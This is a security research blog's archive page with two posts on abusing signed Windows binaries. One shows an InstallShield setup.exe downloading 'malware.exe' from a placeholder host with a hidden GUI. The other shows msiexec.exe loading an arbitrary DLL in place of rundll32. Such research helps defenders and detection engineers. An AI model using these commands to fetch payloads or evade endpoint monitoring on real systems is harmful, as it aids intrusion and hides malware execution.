You are browsing the archive for EDR.

Using signed Installshield installers as downloaders

June 2, 2019 in Anti-Forensics, EDR, Living off the land, LOLBins, Reusigned Binaries

Most of modern InstallShield setup programs are wrappers for MSI. The task of launching the installation wizard is delegated to a setup.exe program that is present as a stub of the file.

The stub accepts command line arguments shown below:

  • /L language ID
  • /S Hide intialization dialog.
  • /V parameters to MsiExec.exe
  • /UA[url to InstMsiA.exe]
  • /UW[url to InstMsiW.exe]
  • /UM[url to msi package]
  • /US[url to IsScript.msi]

Not all setup.exe I tested accept all these arguments, or perhaps I didn’t know how to properly use them. It’s actually a bit of a mess — this file [PDF warning] lists many InstallShield command line arguments, and while it covers many versions of the program, many of these switches require a lot of trial and error + most won’t work. You can either try your luck, or better yet, reverse particular version of Installshield stub. In any case… sometimes we may get lucky – as I was with /UM[URL] command line argument that I successfully tested on an older Installshield installer for ACDSEE software (from 2010).

Running the following command will make the setup program download a file of your choice and place it into a %TEMP%\_is-<random> folder on your system:

setup.exe /umhxxp://www.[somedomain].com/malware.exe /s

The command uses “/S” to hide most of the GUI. Most, because once your file is downloaded, and setup recognizes that it’s not a valid MSI, you will see this dialog box:

Its presence has its pros and cons. It’s good, because it pauses the setup program for a moment. Bad, because there is a GUI visible. When this dialog pops up, your .exe is already in the %TEMP%\_is-<random> directory and you can fetch it. Once you click OK, all files in that temporary folder will be deleted.

Not the most elegant solution for downloading files, but well… it’s just yet another option.

msiexec.exe as a LOLBIN

May 29, 2019 in EDR, Living off the land, LOLBins


As Oddvarmoe pointed out it was described before by Philip Tsukerman. Thanks!

Update #2

It looks that this technique was described even earlier by Stefan Kanthak on his excellent Sentinel page.

Old Post

This is just a quick note. Not sure if anyone pointed it out before, but msiexec.exe can work as a replacement for rundll32.exe.


msiexec.exe -Z <your DLL>
msiexec.exe -Y <your DLL> 

That’s it!